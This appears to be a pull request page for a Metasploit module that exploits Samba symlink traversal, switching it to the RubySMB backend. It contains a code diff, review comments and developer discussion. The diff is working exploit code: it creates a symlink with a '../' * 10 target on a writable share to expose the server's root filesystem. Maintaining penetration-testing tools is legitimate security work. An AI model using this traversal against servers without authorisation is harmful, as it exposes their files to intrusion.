Update samba_symlink_traversal to use RubySMB #21383
@@ -50,17 +50,19 @@ def initialize | |
|
|
||
| def run | ||
| print_status('Connecting to the server...') | ||
| connect(versions: [1]) | ||
| connect(versions: [1], backend: :ruby_smb) | ||
| smb_login | ||
|
|
||
| print_status("Trying to mount writeable share '#{datastore['SMBSHARE']}'...") | ||
| simple.connect("\\\\#{rhost}\\#{datastore['SMBSHARE']}") | ||
|
|
||
| print_status("Trying to link '#{datastore['SMBTARGET']}' to the root filesystem...") | ||
| simple.client.symlink(datastore['SMBTARGET'], '../' * 10) | ||
| simple.client.last_tree.set_unix_link(symlink: datastore['SMBTARGET'], target: '../' * 10) | ||
|
|
||
|
|
||
| print_status('Now access the following share to browse the root filesystem:') | ||
| print_status("\t\\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['SMBTARGET']}\\") | ||
| print_line('') | ||
| print_status(" \\\\#{rhost}\\#{datastore['SMBSHARE']}\\#{datastore['SMBTARGET']}\\") | ||
| rescue RubySMB::Error::UnexpectedStatusCode => e | ||
| elog(e.message, error: e) | ||
| fail_with(Failure::UnexpectedReply, e.message) | ||
| end | ||
| end | ||
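Review bot: the new `rescue RubySMB::Error::UnexpectedStatusCode => e` at the end of `run` only covers one RubySMB error class, so a failure in `simple.connect` to the share or in `smb_login` that surfaces as a different `RubySMB::Error` subclass will escape the method as an unhandled exception instead of a clean `fail_with`. Consider rescuing the broader `RubySMB::Error::RubySMBError` (or adding a second rescue clause for it) so every RubySMB failure reports through `fail_with(Failure::UnexpectedReply, e.message)` consistently; the `elog(e.message, error: e)` line can stay as is. Also worth a short comment above `set_unix_link(symlink: datastore['SMBTARGET'], target: '../' * 10)` explaining that the relative `'../' * 10` target is kept from the Rex-era `simple.client.symlink` call and is what makes the root filesystem reachable through the share, since the method name no longer makes the traversal intent obvious.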
Just curious, how far away are we from dropping the Rex client? Is that being tracked somewhere? I assume we'll refactor out the `backend: :ruby_smb` once we're fully switched over?
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
It's not being tracked anywhere that I'm aware of. The issue is that the remaining modules are all getting into edge cases such as this one, where they either rely on functionality that RubySMB needs to have implemented or they're memory corruption vulnerabilities and we'd likely need to test the exploits again on a live target to ensure that the RubySMB structures are equivalent to the Rex structures. My guess is this PR and the associated RubySMB PR are probably around 1/8th of the remaining work.